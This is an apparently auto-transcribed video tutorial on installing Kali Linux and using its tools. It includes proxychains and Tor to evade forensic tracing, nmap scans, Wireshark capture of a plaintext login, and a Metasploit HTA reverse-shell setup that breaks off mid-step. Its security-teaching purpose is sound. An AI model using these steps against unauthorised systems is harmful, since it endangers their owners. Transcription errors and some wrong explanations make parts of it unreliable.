distribution so we can select Linux over here and the version as you can see here have multiple versions such as the multiple kernels every distribution has a a parent distribution for example Kal Linux has Debian and there are other distributions which are based or forked from some parent distribution kal Linux is based off of Debian so we can go with the highest version of Debian which is the Debian 10.x 64bit go next we can write any such name we can write Kal Linux so that it’ll be easier to recognize the virtual machine among this list of virtual machine instances the location can be any location you decide to put by default it should be the documents folder but anywhere you put it will hold up all the information regard the operating system all the files you download all the configurations you store everything will be stored in this particular location that you provide when we go next we are asked about the disk capacity this disk capacity will be all the storage that will be provided to your virtual machine of Kal Linux think of your Windows device if you have a 1 TB of hard drive you have the entirety of the hard disk to store data on how much data you give here you can only store up to that amount of data not to mention some amount of capacity will be taken up by the operating system itself to store its programs and applications for now we can give around let’s say 15 GB of information or if it recommended size for DBN is 20 we can just go ahead with 20 it depends all on the user case if you are going to use it extensively you can even go as high as 50 or 60 GB if you have plans to download many more applications and perform multiple different tests another option we get over here is storing virtual discs as a single file or storing them into multiple files as we already know this virtual machine run entirely on VMware sometimes when transferring these virtual machine instances let’s say from a personal computer to a work computer we’re going to need to copy up the entire folder that we had mentioned before over here instead all virtual machines have a portability feature now this portability feature is possible for all scenarios except it is much easier if the split the virtual disck into multiple files now even if this makes what porting virtual machines easier from either system to system or software to software let’s say if you want to switch from VMware to Virtual Box or vice versa the performance takes a small hit it’s not huge but it’s recommended to go with storing the virtual disc as a single file if you have no purposes of ever moving the virtual machine even if you do it’s not a complete stop that it cannot be ported it’s just easier when using multiple files but in order to get the best performance out of the virtual machine we can store it as a single file over here this is a summary of all the changes that we made and all the configurations that have been settled until now now at this point of time we have not provided the ISO file yet which is the installation file for the Kali Linux that we downloaded from this website as of right now we have only configured the settings of the virtual machine so we can press on finish and we have Kal Linux in the list now to make the changes further we press on edit virtual machine settings the memory is supposed to give the RAM of the virtual machine the devices with RAM of 8 GB or below that giving high amount of RAM will cause performance issues and the host system if the memory has some amount of free storage left let’s say on idle storage my Windows machine takes about 2GB so I have 6GB of memory to provide although if you provide all of the 6GB it will be much more difficult for the host system to run everything properly so for this instance we can keep it as 2GB of memory for the virtual machine instance similarly we can use the number of processors and we can customize it according to our liking let’s say if we want to use one processor but we want to use two different cores we can select them as well hard disk is preset up as the SCSI hard disk and it does not need to be changed for the installation of this operating system at all cdi DVD this is where the installation file comes you can think of the ISO file that we downloaded as a pen drive or a USB thumb drive which is necessary to install an operating system to provide this we’re going to select use ISO image file we’re going to click on browse going to go to downloads and select the IMO file over here select open and you can see it is already loaded up next in the network adapter it is recommended to use NAT this helps the virtual machine to draw the internet from the host machine settings if your host machine is connected to the internet then the virtual machine is connected as well there are some other options such as host only or custom segments or LAN segments but those are not necessary for installation rest of them are pretty standard which do not need any extra configuration and can be left as it is press okay and now we can power on this virtual machine in this screen we can choose how we want to proceed with the installation we have a start installer option over here so we’re going to press enter on that we’re going to wait for the things to load from the ISO file um the first step in the installation is choosing the language of the operating system for this we can go with English as standard this is a location this will be used for setting up the time and some of the internal settings which depend entirely on the location of the user so for this we’re going to go with India configuring the keyboard it’s always recommended to go with the American English first many people make a mistake of going with the Indian keyboard if it is possible and it provides a lot of issues later on so it’s always prefer to go with the American English and if later we see some necessity of another keyboard dialect that is ne required we can install it later but for now we should always stick with American English as a basic at this point it’s going to load the installation components from the ISO file it is a big file of 3.6GB so it has a lot of components that need to be put into the virtual machine which can also be used to detect hardware once the hardware and the network configuration is done by the ISO file we want to write a host name for the system this host name can be anything which is used to recognize this device on a local network or a LAN cable let’s say if we use the name Kali domain name you we can skip it for now it’s not necessary as such for the installation this is the full name for the user let’s say we can provide the name as simply learn as a full name next we’re going to set up a username this username is going to be necessary to identify the user from its root accounts and the subsequent below accounts for now we can give it as something as simply 1 2 3 now we have to choose a password for the user now remember since this is the first user that is being added onto this newly installed operating system it needs to be a password for the administrator we can use whichever password we like over here and use the same password below and press on continue at this point it’s going to detect on the components on which the operating system can be installed like here there are multiple options like the use entire disk use entire disk and setup LVM use entire disc and setup encrypted LVM for newcomers it is recommended to just use the first one since LVM encryption is something that you can learn afterwards when you’re much more hands-on with the Linux operating system for now we’re going to use the use entire disg guided installation and press on continue when we set up the virtual machine on VMware we had set up a disk capacity there we gave a propose 20 GB that is the hard disk which is being discovered here even though it is a virtual disk on VMware it acts as a normal hard disk on which an operating system can be installed so we select this one and press on continue here there is a multiple partition system all the operating systems that are installed have different components one is used for the keeping of the applications one for the files other for the RAM management and other things for newcomers it is always recommended to keep it in one partition and we’re going to select that and press on continue this is just an overview of the partition it’s going to make as you can see it has a primary partition of 20.4GB and a logical partition of 1 GB used for swap memory now these kind of naming can be confusing for people who are not well versed with Linux operating systems or in general virtualization but for now you can go ahead and press on continue as this will be fine we can press on finish partitioning and write changes to disk and continue it’s just a confirmation page as you can see that SCSI3 is our virtual hard disk of 20 GB disk capacity write the changes to the disk we press yes and click on continue at this point the installation has started now this installation will take a while depending on the num amount of RAM provided the processors provided and how quickly the performance of the system is being hampered by the host machine on quicker systems this will be rather quick while on the smaller ones this will take a while since this is going to take some time to install as it is being run on a virtual machine with only 2 GB of RAM we’re going to speed up this part of the video so we don’t have to waste any more time just watching the progress bar now that our core installation is completed it’s asking us to configure a package manager the work of a package manager on Linux operating system is similar to the Google Play Store on Android mobile devices and on the App Store for the Apple devices it’s an interface to install external applications which are not installed by default let’s say for Google Chrome or any other browser which can be used to browse the internet at this point of time it’s ask us to select a network mirror we’re going to select as yes and move forward with this next it’s going to ask us for a HTTP proxy which we can leave it as blank and press it as continue forward at this point of time it’s looking for updates to the Kali Linux installation this will fetch the new builds from the Kali server so the installation is always updated to the latest version now that the package manager is configured we have the grub bootloader the grub is used for selecting the operating system while booting up its core functionality is to allow the operating system to be loaded correctly without any faults so at this point of time if it asks install the grub boot loader to your primary dive we can select it as yes and press continue remember the installation was conducted on dev SDA so we’re going to select installation of the grub loader on the same hard disk that we have configured we press this one and press continue so now the grub boot loader is being installed the grub is highly essential because it it shows the motherboard where to start the operating system from even if the operating system is installed correctly and all the files are in correct order the absence of a bootloadader will not be able to launch the OS properly as you can see the installation is finally complete so now we can press on continue and it’s going to finalize the changes now you can see Kal Linux being booted up straight away it doesn’t check for the ISO file anymore since the operating system is now installed onto the virtual hard disk storage that we had configured before here we’re going to enter our username and password that we had set up before and we have the Kalinux system booted up and this is your homepage we can see the installed applications over here which are being used for penetration testing by multiple security analysts worldwide all of these come pre-installed with Kal Linux and others can be installed using the AP package manager that we had configured we can see a full name over here and with this our installation of the Kali Linux is complete it’s no secret that the vast bulk of our internet usage is vulnerable to hacking whether it’s through hazardous messaging apps or faulty operating systems penetration testing has become the norm for vulnerability assessment in order to fill this vacuum in digital security kali Linux is a well-known operating system in this fight against hackers kal Linux a distribution designed specifically for penetration testers has layers of features that we will go over in today’s lesson and take a look at some of the tools and features that the operating system has to offer let’s take a look at the videos topics and features that the operating system has to offer let’s take a look at the videos topics we start by learning the requirements of an operating system like Kali Linux we learn more about the core features of the OS and its intricacies moving on we take a look at the five distinct stages of penetration testing that dictate the flow of vulnerability assessment in general next we learn about some important tools that can be found on Kali Linux which are geared specifically for ethical hacking purposes and finally we have an extensive demonstration where we work on some basic terminal commands proxy tools and a couple of highly regarded software from the crux of the operating system let’s start by learning why one should learn Kali Linux in the first place in today’s world an organization’s most valuable asset is its information or data this is true for all kinds of businesses be it public or private on a daily basis they all deal with enormous amounts of sensitive information as a consequence terrorist groups hacking teams and cyber thieves often attack them to ensure the safety and protection businesses use a variety of security measures and regularly update their index organizations must be proactive in this age of digitalization by regularly assessing and updating their security everyday hackers discover new methods to breach firewalls ethical hackers or white hat hackers provide a fresh perspective on security they conduct penetration tests to validate security measures generally they will penetrate your networks and give you relevant information about your security posture once an organization has this knowledge it may upgrade its security procedures accordingly the latest version of Kallay Linux comes with more than 600 penetration tools pre-installed after reviewing every tool that was included in Backtrack developers have eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality occasionally when conducting penetration testing or hacking we must automate our activities since there may be hundreds of conditions and payloads to test and manually examining everything is timeconuming to improve our productivity we utilize tools that come prepackaged with Kali Linux these tools not only save us time but also accurately capture and process the data the Kylie Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external assets greatly reduces the risk of source contamination although penetration tools tend to be written in English the developers have ensured that Kali includes true multilingual support allowing more users to operate in the native language and locate the tools they need to do for the job since ARM based single board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive the development team knew that Kali’s ARM support would need to be as robust as they could manage with fully working installations kali Linux is available on a wide range of ARM devices and as ARM repositories integrated with the mainline distribution so tools for ARM are updated in conjunction with the rest of the distribution tools now that we understand the necessity for an operating system like Kali Linux let us take a look at some of its core features and offerings to the ethical hacking world kali Linux formerly known as Backtrack Linux is an open-source Linux distribution which is aimed at advanced penetration testing and security auditing it contains several hundred tools targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering kali Linux is a multiplatform solution accessible and freely available to information security professionals and hobbyists among all the Linux distributions Kali Linux takes its roots from the Debian operating system debian has been a highly dependable and stable distribution for many years providing a similarly strong foundation to the Kali Linux desktop while the operating system is capable of practically modifying every single part of our installation the networking components of Kali Linux come disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a deeper element of security and control to the most enthusiastic of users let us now take a look at the five stages or phases of penetration testing this is the first stage of the penetration test which is known as the reconnaissance phase in this stage the security researcher collects information about the target it can be done actively which means you are collecting information without contacting the target or even both it helps security firms gather information about the target system network components active machines open ports and access points operating system details etc this activity can be performed by using information available in the public domain and using different tools the next phase is more tool oriented rather than performed manually and it is the scanning phase the penetration tester runs one or more scanner tools to gather more information about the target the penetration tester runs one or more scanner tools to gather information about the target by using various scanners such as war dialers port scanners network mappers and vulnerability scanners the tester collects as many vulnerabilities which help to turn an attack in a more sophisticated way the next stage is known as the gaining access phase in this phase the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous stage exploitation may be buffer overflow attacks denial of service or DOS attacks session hijacking and many more basically penetration tester extracts information and sensitive data from servers by gaining access using different tools in the maintaining access phase the penetration tester tries to create a backdoor for himself it helps him to identify hidden vulnerabilities in the system and can later act as a gateway to retrieve control of the system in the final phase of covering tracks the penetration tester tries to remove all logs and footprints which help the administrator identify his presence this helps the tester to think like a hacker and perform corrective actions to mitigate those activities now that we understand the basics of penetration testing and how ethical hackers go about their way let us take a look at some notable tools which can be used on Kali Linux at the top of the chain lies NAPAP lmap is a free and open-source utility port scanner which can be used for network discovery and security auditing many systems and network administrators also find it useful for tasks such as network inventory managing service upgrade schedules and monitoring host or service uptime it is most beneficial in the early stages of ethical hacking that a hacker must figure the possible entry point to a system before running the necessary exploits thus allowing the hacker to leverage any insecure openings and breach the device it’s a part of the scanning phase of the penetration testing nap uses raw IP packets in novel ways to determine what hosts are available on the network what services these hosts are offering what operating systems they are running and their versions what type of packet filters and firewalls are in use and dozens of other characteristics it was designed to rapidly scan large networks but works fine against single hosts as well since every application that connects to a network needs to do so via a port the wrong port or server configuration can open a can of worms which lead to a thorough breach of the system and ultimately a fully hacked device next on the list we have metas-loit the metas-ploit framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systemic vulnerabilities on networks and servers as a part of the third stage of penetration testing it’s an open-source framework which can be easily customized and used with most operating systems with Metasloit the ethical hacking team can use a readymade or custom code and introduce it into a network to probe for weak spots as another flavor of threat hunting once these flaws are identified and documented the information can be used to address systemic weaknesses and prioritize solutions once a particular vulnerability is identified and the exploit is fed into the system there are a host of options for the hacker depending on the vulnerability hackers can even run root commands from the terminal allowing complete control over the activities of the compromised system as well as all personal data stored on the device a big advantage of metas-loit is the ability to run full-fledged scans on a target system thereby giving a detailed picture of the security index of said system this also provides the necessary exploits that can be used to bypass the firewalls and the anti virus software having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers as denoted by the high rank in this list at number three we have Wireshark wireshark is the world’s foremost and widely used networking protocol analyzer it lets you see what happening on your network at a microscopic level and is a de facto standard across many commercial and nonprofit enterprises government agencies and educational institutions wireshark is a popular open-source tool to capture network packets and converts them to human readable binary format it provides every single detail of the organization’s network infrastructure it consists of devices designed to help measure the ins and outs of the network the information collected through Wireshark can be used for various purposes such as realtime or offline network analysis identification of the traffic coming onto your network its frequency and its latency between specific hops this helps network administrators generate statistics based on realtime data wireshark is also a cross-platform tool that can be installed on Windows Linux and Mac systems to enable hackers on all ecosystems to monitor network traffic irrespective of the operating system the development team is determined to maintain this level of freedom for their users in the foreseeable future the next tool on our list is Air Garden which is a part of the third phase of penetration testing this is a multi-use bash script for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts along with being able to launch denial of service attacks on compromised networks this multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking including multifps hacking modes all-in-one WP attack handshake file capturing evil twin attacks pixie dust and so much more it usually needs an external network adapter that supports monitor mode which is necessary to be able to capture wireless traffic traversing the air channels thanks to its open-source nature Air Garden can be used with multiple community plugins and add-ons thereby increasing its effectiveness against a wide variety of routers both in the 2.4 GHz band and 5 GHz band the next tool is John the Ripper john the Ripper is an open-source password security auditing and password recovery tool available for many operating systems john the Ripper Jumbo supports hundred of hash and cipher types including for user passwords of operating systems web apps groupware database servers network traffic captures encrypted private keys file systems and document files some of the key features of the tool include offering multiple modes to speed up password cracking automatically detecting the hashing algorithm used by the passwords and the ease of running and configuring the tool making it a password cracking script of choice for noviceses and professionals alike it can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources the word list being used in this dictionary attacks can be used from the users end allowing for a completely customizable process now that we have covered the basics of Kali Linux let us take a look at the agenda for our demo today we start out with a few terminal commands that are a basic part of a Linux operating system configure our own proxy chains to maintain anonymity while running penetration testing attacks on our victims next we run a few end mapap scans on a local Windows 10 machine to find out the type of information that can be gathered in such a scenario moving on we use Wireshark to monitor internet traffic and understand the importance of encryption and security when browsing the worldwide web next we learn about metas-ploit and its various applications in the line of vulnerability assessment of a device and finally we use metas-ploit to take root access of a fully updated Windows 10 computer system let’s begin with some terminal basics on Kali Linux when most people hear the term Linux they envision a complex operating system used only by programmers however the experience is not as frightening as it appears linux is an umbrella term for a collection of free and opensource Unix operating systems there are many variants like Ubuntu Fedora Debian these are distributions which is will be a more precise term when using a Linux operating system you will most likely utilize a shell which is a command line interface that provides access to the operating system services the majority of Linux distributions ship with a graphical user interface also known as GUI as their primary shell this is done to facilitate user interaction in the first place having said that a command line interface is suggested due to its increased power and effectiveness by entering the commands into the CLI tasks that require a multi-step GUI procedure may be completed in a matter of seconds we can start the terminal by clicking on the prompt icon here on top once the terminal is opened we can put up our commands the first command that we are going to look into is pwd pwd stands for present working directory as of right now what you’re seeing is the terminal window by default if I write pwd and press enter this shows the directory in which the terminal is being run on as of right now it’s in the nf folder of my desktop which is specifically this folder if I open up this folder you can see it is currently empty as in it has no contents if I use another command known as mkdir which is supposed to stand for make directory and I write nf2 shortage for new folder 2 if I open up the nf you can see the new folder is created this is how the pwd command works another important command to change directories it’s called the cd command let’s say right now if I am in NF I want to create a new file in NF2 folder or something else in the NF2 folder i have to shift to cd NF2 now if I write pwd it’ll show the present working directory of home simply learn desktop NF and inside that I am in NF2 right now it is done to navigate to the Linux files and dis directories it requires either the full path or just the name of the directory if we have to move a completely different folder on a completely different file then we can use the entire path like this for now CD works another few commands is we can write cd dot dot and it’ll come back one folder now the pwd will be just NF and not NF2 let’s say we are in this folder and we want to go a different file let’s say if you just go for cd home simpler that’s it right now these are the folders in our current present working directory we have the desktop the documents downloads etc from here we can again go to the desktop using the same cd command cross check the changing of directories and check the files again and yes there we go nf How do we know this what are the command that we are used to show the files and folders that folder is known as the ls command ls can be used to view the contents of a directory by default this command will display the contents of your current working directory if we add some other parameters we can find the contents of other directories as well there are some hidden files as well in Linux which cannot be showed just with ls for example if you just go to cd etc which is a configuration folder for Linux if you write ls now these are the files that can be seen if you want to see the hidden files we’ll have to add one more parameter here like ls minus a and as you can see the number of files have increased this time around there are other things as well that we can see with Linux ls minus al will show the hidden files along with some of the parameters and some of the permissions that has been provided for each file as you can see many of these files have root access some of them can write some of them can read it differs file to file and the ls minus al command is used to check each of these files permission and change them accordingly if needed the next command that we can look for is the cat command or concatenate it is one of the most frequently used commands and it is used to list the contents of a file on the output for example let’s say if I have a file at the desktop in this NF2 folder I will create a document create an empty file E file i’ll open up the document and I’ll write it as hello Kali i will save this up now to change the directories from etc to NF2 we have already discussed how to use the cd command using just the folder name now if you want to go through the entire directory we can write cd home as you can see it is already prompting us to complete the name of the directory at this point we just have to press tab and it completes it for ourself next we already know we have to enter the desktop nf and nf2 and this brings us to the current working directory here if we press ls we can find a file over here now as discussed for the concatenate it is used to show the contents of a file so right now if we press cat a t which stands for concatenate e file as you can see we have written hello kali in the text file and we can see the output right now we can also use it to create new files for example if we write cat any file name such as e file 2 here we can write anything hello kali again once we press ctrl c here we can check e file 2 and we have hello kali again printed over here we can see the same using the concatenate command as well if I press ls you can see we have two files here and I can go with cat e file 2 and I have hello kali again this is how the concatenate command works apart from this it can be used to copy there is a different command like called cp which is used to copy the files from one place to another mind you this is not moving this is only going to copy the command for example currently our PWD which is the present working directory is in the NF2 folder as you can see over here let’s copy the E file to the NF folder we can write CP E file 2 and give the path of the NF folder which will be home simply learn texttop NNF now if I press ls I’ll find both the files in NF2 since I copied to go back to the NF folder again we can again use the same command of no uh we can again use the home simply learn desktop and just NF no NF2 this time just NF as you can see this will change back our present working directory now when we press ls we will find the e file to file and the nf2 folder and we can confirm this using the gui as well this is the nf folder and you can see the nf2 folder and the e file 2 document if I write cat e file 2 cat e file 2 we can see the contents of the file now this can be done using moving as well for example if I go to cd NF2 which is the inside folder it has both the document files like E file and E file 2 let’s say I want to move the E file completely from NF2 to NF1 instead of writing cp the command I’m going to use is mv mv e file and again give the path of the folder into which I have to copy which will be again home simply learn desktop and nf as you can see the contents of the NF2 have appeared here and E file has been moved from NF2 to NF this is the NF2 and we don’t find E file here anymore if we press CD dot dot and we go back to NF LS right now and we can find both the files E file that we moved and E file 2 that we copied from the NF2 folder so this is how copying and moving will work using the terminal now this is just a simple oneline statement that might take a couple of clicks when using GUI this is why the command line interface is considered to be much more streamlined for Linux operating systems another very important command for Linux operating system is the pseudo command pseudo is short for super user do the command enables you to perform tasks that require administrative or root permissions we can think of it as how we run programs as administrator on Windows systems it is not advisable to use this command for daily use because it might be easy for an error to occur and the permissions of root are very intricate so new beginners are advised to use the pseudo command only when absolutely necessary for example pseudo su with this command I am giving this terminal a root permission this SU stands for this user at this point it’s going to ask for my admin password once I enter my password and I now have root access note how the password that I entered did not show up here this is a security measure to prevent people from snooping on your root password which is the endgame of all this operating system as you also can see the symbol changed if the dollar symbol is showing it’s source as a standard user when you switch to root you can easily see a hash symbol this opens up a separate shell inside this terminal command for example we can exit out of the root user to the standard user using the command exit and once again we have the dollar sign and the root has vanished over here there are some commands that will only work with administrative access for example when updating the Kali Linux system we have to use a update as you can see it says problem unlinking the file because permission denied now let’s try this using pseudo sudo apd update as you can see it is updating the package repositories which work as the software installed on the system this can be done using either writing the pseudo command every time we want to perform a root access or we can just write pseudo su once and write a update alone the fetching is complete over here for the second example let’s say I just write pseudo su and this time it’s not going to ask me the password because at this current terminal process I’ve already provided the root password once and it is in memory right now now when we used to update the system we had to write pseudo a update that was because we were running it as a standard user now we are running it as a root user so all we have to write is a update and it’s going to continue its work there you go another command that can be useful is the ping command it’s pretty self-explanatory it’s going to be checking the internet connectivity it can be used to check internet connectivity or you can see if the there is a local server on your system which needs to be pinged then you can check that for example if we have to write ping and we can use either IP address or domain let’s say if you want to check that if we can access google.com using this Kali Linux installation or not we can write ping google.com and you can see it shows the bytes being sent and received and how much time it took to take up the request this can be done for local systems as well for example this installation of Kali Linux is being run on a virtual machine once this machine is running I still have my host machine running over here the IP address of which is 192.168.29 179 if I try to ping this from here as you can see the time to complete the request is drastically low compared to a website on the internet considering this is on the local network this is how the ping command is worked and it can show you what kind of packages are transmitted how many are received if there was any kind of packet loss between the connection window and other details a very important command when working with the terminal for a long duration is a history command pretty self-explanatory there are so many commands that are being run sometimes people forget what was the change they did or what was the directory name they put a history command helps to recover some of the commands that you have written it doesn’t go all the way back but it takes up many commands that were inputed in the last few processes this is how the history command works these are some of the most commonly used terminal commands if you want to learn more about this terminal and every other feature of this please let us know in the comment section and we’ll try to make an in-depth tutorial especially if you got repeat if you want to learn more about the terminal please let us know in the comment section and we will try to make an in-depth tutorial specifically for terminal commands on Linux moving on we learn how to configure proxy chains on our system proxying refers to the technique of bouncing your internet traffic through multiple machines to hide the identity of the original machine it is a good tool that hackers use to accomplish this goal is proxy chains essentially you can use proxy chains to run any program through a proxy server this will allow you to access internet from behind a restrictive firewall which hides your IP address proxy chains even allows you to use multiple proxies at once by chaining them together one of the most important reasons that proxy chains is used in a security context is that it’s easy to evade detection attackers often use proxies to hide their true identities while executing an attack and when multiple proxies are chained together it becomes harder and harder for a forensic professional to trace the traffic back to the original machine when these proxies are located across countries investigators would have to obtain warranties in the local jurisdictions where every proxy is located to to see how proxy chain works let’s open Firefox first and check our current IP address write Firefox and there we go as we can see Firefox is now open let’s check our current IP address right now if you go to an address called my ip.com and you can see it easily detects our country is in India and this is a public IP address now if we move to the terminal again here we can now write proxy chains minus h what this minus h does is it finds a help it uh it it stands for the help file this is for help file what we found out using this is proxy chains has a config file here etc proxy chains 4 cf this is the config file found using this config file we can customize how our proxy chain should work if we want to open that we have to use it in a text editor on Windows we have Notepad and other things like that Microsoft Word to edit documents on Linux we have a tool called nano to access the nano we use the command nano and give the path of the file that we want to check as of right now the proxy chains config file is located over here so we’re going to follow the path there chains 4 cf and here we go we see the config file there are three basic types of proxy chaining here we have a strict chain where all the proxy in the list will be used and they will be chained in order we have a random chain where each connection made through proxy chains will be done by a random combo of proxies in the proxy list and you have dynamic chain it’s the same as strict chain but dead proxies are excluded from the chain and here we can set up whichever type we want to enable or disable a particular type we use the hash symbol here as you can see right now all the lines have a hashtag symbol at the front except this one a dynamic chain this is the current one being used let’s say if I want to use a strict chain method so

I can add a hash value here and remove the hash here at one point of time any one of these three four types should be enabled let’s go for the dynam um dynamic chain we can disable this strict chain by putting the hashtag in front and removing the dynamic chain as you can see below we have few commands to how to handle the nano text editor this symbol is known as the control button on your keyboard now if we want to write out which is synonymous to saving the file supposed to go with control O so if I press Ctrl O on my keyboard it says file name to write and we have to press enter here since we want to overwrite the proxy chains 4.f file we don’t want to create a new file over here so just press enter and we get a permission denied this permission denied we’re getting is because we have opened this using a standard user etc is a system folder to be able to use make some changes we have to use it using a pseudo command to exit this nano we have to use the controlx command we use controll x we’re going to clear and this time we’re going to use the pseudo command pseudo nano etc proxy chains 4 cf and we have the same file open up again now this time if you want to make a change let’s say we’re going to add a strict chain instead of a dynamic chain we remove the hashtag from strict we’re going to use control O for the save file option we’re going to press enter and it says wrote 160 lines again if you want to reverse this change we put the hashtag over here enable dynamic chain we press Ctrl O press enter and it says root 160 lines now we can exit straight away using the control X format right now we have not provided any file or a proxy chain we can have proxy IP addresses from the internet but we have to make sure that they are safe and they don’t snoop on our data when there is no proxy chains being provided personally it going it’s going to use the to network but for that we have to start to is a service in Linux to know more about the store we can write sudo systemct ctl which is used to know the status of services on the Linux operating system and status of to uh system ctl sorry uh as instead of stl It should be systemctl status to as you can see it is a to service anonymizing overlay network for TCP connections and it’s currently inactive now to start this up we have to write sudo systemct ctl start dot now if we repeat the same sudo systemctl status store as you can see it’s active now you can see the green logo over here okay to integrate the Firefox and the browser we can use the proxy chains command directly over here we can write proxy chains we can use Firefox to launch our web browser and let’s say if we want to visit google.com we press enter and the Firefox window is launched and it should open up google.com next and there we go if we go to my ip.com once again as you can see we have a different IP address and the country is unknown as well so this is how we can use proxy chains to anonymize uh internet usage when using Kali Linux next on our agenda is the ability to scan networks using N MAPAP at its core N MAPAP is a network scanning tool that uses IP packets to identify all the devices connected to a network can learn more about N map using the help file as you can see these are some of the parameters that can be used when scanning ports of a system you can see the version and the URL of the of the service over here the primary uses of N mapap can be broken into three core processes first the program gives you detailed information on every IP active on your network and then each IP can then be scanned secondly it can also be used to providing a lot of live hosts and open ports as well as identifying the OS of every connected device thirdly NAPAP has also become a valuable tool for users looking to protect personal and business websites using N MAPAP to scan your own web server particularly if you’re hosting your website from home is essentially simulating the process that a hacker would use to attack your site attacking your own site in this way is a powerful way of identifying security vulnerabilities as we already discussed the host Windows 10 machine on the system has an IP address of 192.168 29.179 if you want to test the OS scan of the system we’re going to first get the root permission over here we use the pseudo command and now we are a root user we’re going to launch the command N map minus O which is supposed to be an OS detection scan the IP address we can use of the host system 192.168.29.1 29.179 in a legitimate penetration testing scenario we can use the IP address of the vulnerable digit device over here we are going to let it scan for a while and it’s going to give us some guesses on what can the OS be as you can see the scan is done and it has shown some of the ports that are open you can see the MSRPC port open the HTTPS 443 port open which is used to connect to the internet and it has some aggressive OS guesses as well for example it thinks there’s a 90 94% chance that it’s going to be a Microsoft Windows XP Service Pack 3 that’s partly because a lot of the Windows XP update packages are still prevalent on Windows now that the OS detection is confirmed there are multiple more details that we can gather from N map let’s go with the N map minus a command which is supposed to capture as much data as possible there is also a speed setting you can call it a speed setting or a control setting of the minus T minus T ranges from T0 to T1 to T2 all the way up to T5 this basically determines how aggressively the victim is being scanned if you scan slowly it’ll take more time to provide the results but it will also give a less chance for the intrusion detection system on the vulnerable machine firewall to detect that someone is trying to penetrate the network for now if you want to go with somewhat of a high speed we can go with the T4 and provide the same IP address of the local machine I am trying to attack it’s going to take a little bit of time since it’s trying to capture a lot of information as you can see the results are now here it it launched a scan and took a few top ports that are most likely vulnerable from a Windows XP perspective and it showed a few ports over here it has not shown 991 filtered ports which could not be attacked anyway since they were closed for outside access it shows a few fingerprint settings like the connection policies and the port details it shows an HTTP options some other intricate details that can be used when you attacking its servers it shows a VMware version that it’s running and some few other ports over here apart from that we also have the aggressive OS guesses over here just like we did with the minus O and you can see this time it is showing Windows 7 as 98% no exact OS matches since uh if there was any exact OS matches we could have seen a 100% chances over here this is a trace route a trace route will be the time and the path a connection request takes from the source to the destination for example this request went from 19 to 16872.2 to a destination address since this is a local machine it took only a single step on multiple occasions if you’re trying to access a remote system it’s going to be a number of trace suits when it jumps from firewall to firewall and router to router this is how we can use end mapap to find information about a system and find some vulnerable ports we can access moving on we have a tutorial on how to use Wireshark to sniff network traffic to start using Wireshark we’re going to have to open the application first now during installation of Wireshark there is an option to enable if nonroot users can be able to capture traffic or not in my installation I have disabled that so I will be launching Wireshark when using the root user itself also to capture data we need an external Wi-Fi adapter you can see it over here in the VM tab removable devices link 802.1 and WLAN this is a external Wi-Fi adapter which is inserted into my USB system can see it over here if I write IW config this is the one wlan zero this is absolutely necessary because we need to have a monitor mode required we won’t need it for sniffing data on wireshark right now but it’s going to be necessary later on in this tutorial as well as we will see for now we can just start up wireshark by writing its name on the command line and it should start the program here we go here it’s going to check which of the adapters we want to use for example right now the ETH0 which supposed to stand for Ethernet zero port you can see data is being transmitted up and down we’re going to select ETH0 and we have started capturing data you can see the data request from the source the destination and the time and the which protocol it is following everything we can see and we can see the IPv4 flags here as well as you can see over here to capture internet traffic we can try running Firefox if we just write wikipedia.com And you can see the number of requests increasing okay this is spelling mistake wikipedia here you can see the application data of all these requests going up and they’re connected to a destination server of 103 102 166.224 now if you even if you check the transmission control protocol flags over here and so many more things we cannot find anything beneficial as you can see the information over here is gibberish which is supposed to be since it’s supposed to be encrypted now this is possible due to this being an HTTPS website hence you can see the lock symbol over here and connection is supposed to be secure now what about HTTP ports we have seen a many people recommend to not visit HTTP ports repeat we have seen many people recommend to not visit HTTP websites and even if you have to visit to not provide any critical information for example let’s go to a random HTTP page over here as you can see this is saying connection is not secure and this is an HTTP HTTP page and not HTTPS now let’s check for some of the information that is passing through this this is a login form let’s say I have a legitimate account over here if I write my account name and my password is supposed to be password 1 2 3 4 i press login and uh the password does not match because I do not have an account over here but let’s say I did and I was logged in as expected we can go to wireshark we can use filters over here now all the requests that I’m sending it’s a TCP request so I can write a filter containing TCP contains whatever string if it is being passed let’s say for the end username I write my account name so I can just write my account name over here and press enter to find a request over here now as you can see there are many flags over here if I go to the HTT HTML form URL encoded and open up some of its flags as you can see I can see my account name and simply learn password over here this is the same details that I input on the website let’s say I did have a legitimate account on this website i would have logged in with no problems but anyone who would be using Wireshark to sniff on the data can easily get my credentials from here this is why it’s recommended to not provide any information on HTTP pages the security is not up to the mark and always look for the lock symbol when visiting any website or making any internet transactions or providing any information this is how we can use Wireshark to detect transmission and sniff packet data that is being transferred through the network adapter next we have to learn about what is Metasploit the Metasloit project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS development we can open up the terminal here we’re going to allow root access and to open up Metasloit the keyword is MSF console it’s going to take a little bit of time to start it up now the Metasloit console has been loaded from here we can decide what type of attack we want to launch and what kind of exploits we can launch against vulnerable targets for example like we already discussed I’m running this virtual machine on a Windows 10 host machine so if I open the command prompt for my Windows 10 over here if I need to check the IP address once I go with IP config here you can see the IP address of this local machine moving on if we have to attack that machine let’s say we want to see what kind of exploits are going to work over there now we already know that Windows has some common vulnerabilities one of those vulnerabilities is the HDA server vulnerability hda is supposed to be a HTML application but when passed the right payload it can be used to open a back door into a system to start off with the metasloit and accessing such applications we’re going to use the command use exploit and the name of the reverse HDA server is this Windows MIS for miscellaneous HDA server as you can see it already found this one all right now there are some options that we need to set for this exploit to go through for example you can see some of the options over here there’s a payload the payload is supposed to be the malicious file that we are going to send on the HTML application which allows us to give the back door for example right now the payload which is the malicious file is a Windows meter reverse TCP completely understandable now let’s set the LHOST lhost and Rhost and SRV host should be the one where we are going to launch the attack from for example if we launched another tab of this console and we just press config 